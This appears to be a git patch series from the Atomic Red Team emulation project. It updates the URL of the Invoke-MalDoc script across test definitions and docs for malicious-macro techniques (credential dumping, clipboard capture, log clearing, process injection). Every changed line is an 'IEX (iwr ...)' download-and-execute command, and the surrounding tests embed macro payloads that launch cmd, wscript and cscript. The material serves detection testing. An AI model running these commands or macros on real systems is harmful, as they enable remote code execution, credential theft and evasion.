"`nEnd Sub" + } + + if ($officeProduct -eq "Word") { + $doc = $app.Documents.Add() + } + else { + $doc = $app.Workbooks.Add() + } + $comp = $doc.VBProject.VBComponents.Add(1) + $comp.CodeModule.AddFromString($macroCode) + $app.Run($sub) + $doc.Close(0) + $app.Quit() + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($comp) | Out-Null + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($doc) | Out-Null + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($app) | Out-Null + [System.GC]::Collect() + [System.GC]::WaitForPendingFinalizers() + Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$officeVersion\$officeProduct\Security\" -Name 'AccessVBOM' -ErrorAction Ignore +} \ No newline at end of file diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml index cb51c49b..e5decf7f 100644 --- a/atomics/T1555/T1555.yaml +++ b/atomics/T1555/T1555.yaml @@ -24,7 +24,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract" cleanup_command: | Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore diff --git a/atomics/T1564/T1564.yaml b/atomics/T1564/T1564.yaml index 2a20881f..c0874281 100644 --- a/atomics/T1564/T1564.yaml +++ b/atomics/T1564/T1564.yaml 
@@ -34,7 +34,7 @@ atomic_tests: $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: | Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore diff --git a/atomics/T1566.001/T1566.001.yaml b/atomics/T1566.001/T1566.001.yaml index de1a135a..66e9d7d0 100644 --- a/atomics/T1566.001/T1566.001.yaml +++ b/atomics/T1566.001/T1566.001.yaml @@ -57,7 +57,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: | From 1e024d99ea73ab99540b7f6863c1e16cfa28bed3 Mon Sep 17 00:00:00 2001 
From: CircleCI Atomic Red Team doc generator Date: Fri, 2 Jul 2021 12:38:23 +0000 Subject: [PATCH 84/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 38 +++++++++++++++++----------------- atomics/T1053.005/T1053.005.md | 2 +- atomics/T1055.012/T1055.012.md | 2 +- atomics/T1055/T1055.md | 2 +- atomics/T1059.005/T1059.005.md | 4 ++-- atomics/T1070.001/T1070.001.md | 2 +- atomics/T1115/T1115.md | 2 +- atomics/T1204.002/T1204.002.md | 10 ++++----- atomics/T1555/T1555.md | 2 +- atomics/T1564/T1564.md | 2 +- atomics/T1566.001/T1566.001.md | 2 +- 11 files changed, 34 insertions(+), 34 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 3afb17fe..7160e201 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -1114,7 +1114,7 @@ credential-access: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract" cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore 
@@ -6933,7 +6933,7 @@ collection: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard" cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore @@ -15237,7 +15237,7 @@ privilege-escalation: ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX - (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n" name: powershell @@ -15372,7 +15372,7 @@ privilege-escalation: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell - name: Remote Process Injection in LSASS via mimikatz 
@@ -16268,7 +16268,7 @@ privilege-escalation: ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX - (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" name: powershell @@ -20455,7 +20455,7 @@ defense-evasion: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" name: powershell elevation_required: true @@ -25299,7 +25299,7 @@ defense-evasion: $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore 
@@ -30944,7 +30944,7 @@ defense-evasion: ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX - (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n" name: powershell @@ -31079,7 +31079,7 @@ defense-evasion: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell - name: Remote Process Injection in LSASS via mimikatz @@ -44428,7 +44428,7 @@ persistence: ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX - (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" name: powershell 
@@ -58730,7 +58730,7 @@ execution: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore @@ -58792,7 +58792,7 @@ execution: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" name: powershell @@ -58831,7 +58831,7 @@ execution: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" name: powershell 
@@ -58869,7 +58869,7 @@ execution: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product} name: powershell @@ -59004,7 +59004,7 @@ execution: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell - name: Potentially Unwanted Applications (PUA) @@ -60224,7 +60224,7 @@ execution: ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX - (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" name: powershell 
@@ -61138,7 +61138,7 @@ execution: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec" cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null @@ -61176,7 +61176,7 @@ execution: ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX - (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n" cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" @@ -68378,7 +68378,7 @@ initial-access: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore 
diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md index 5c41ae1d..a2a34da5 100644 --- a/atomics/T1053.005/T1053.005.md +++ b/atomics/T1053.005/T1053.005.md @@ -202,7 +202,7 @@ This module utilizes the Windows API to schedule a task for code execution (note ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler" ``` diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md index df2fa1a2..2df00d31 100644 --- a/atomics/T1055.012/T1055.012.md +++ b/atomics/T1055.012/T1055.012.md @@ -81,7 +81,7 @@ This module executes notepad.exe from within the WINWORD.EXE process ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit" ``` diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index 453192f3..24905c99 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md 
@@ -37,7 +37,7 @@ is required. ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" ``` diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md index 41960a40..d81a0599 100644 --- a/atomics/T1059.005/T1059.005.md +++ b/atomics/T1059.005/T1059.005.md @@ -93,7 +93,7 @@ You can validate this by opening WinWord -> File -> Account -> About Word ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec" ``` @@ -151,7 +151,7 @@ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.b ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract" ``` diff --git a/atomics/T1070.001/T1070.001.md b/atomics/T1070.001/T1070.001.md index 4f9e6f5f..cc798f16 100644 
--- a/atomics/T1070.001/T1070.001.md +++ b/atomics/T1070.001/T1070.001.md @@ -106,7 +106,7 @@ Elevation is required for this module to execute properly, otherwise WINWORD wil ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" ``` diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md index 447bfa64..1d206989 100644 --- a/atomics/T1115/T1115.md +++ b/atomics/T1115/T1115.md @@ -133,7 +133,7 @@ This module copies the data stored in the user's clipboard and writes it to a fi ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard" ``` diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md index f9bf6006..0d46e7c3 100644 --- a/atomics/T1204.002/T1204.002.md +++ b/atomics/T1204.002/T1204.002.md 
@@ -55,7 +55,7 @@ References: ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" ``` @@ -152,7 +152,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" ``` @@ -207,7 +207,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" ``` 
@@ -261,7 +261,7 @@ Microsoft Office creating then launching a .bat script from an AppData directory ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product} ``` @@ -423,7 +423,7 @@ and pull down the script and execute it. By default the payload will execute cal ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" ``` diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md index 24135db4..67f4c9ca 100644 --- a/atomics/T1555/T1555.md +++ b/atomics/T1555/T1555.md @@ -32,7 +32,7 @@ them to $env:TEMP\windows-credentials.txt ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract" ``` 
diff --git a/atomics/T1564/T1564.md b/atomics/T1564/T1564.md index 08e4f131..87730cb9 100644 --- a/atomics/T1564/T1564.md +++ b/atomics/T1564/T1564.md @@ -45,7 +45,7 @@ oleObject.bin file is a payload that is parsed out and executed on the file syst $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap ``` diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md index da4434af..4affc48e 100644 --- a/atomics/T1566.001/T1566.001.md +++ b/atomics/T1566.001/T1566.001.md @@ -79,7 +79,7 @@ Upon execution, CMD will be lauchned and ping 8.8.8.8 ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" ```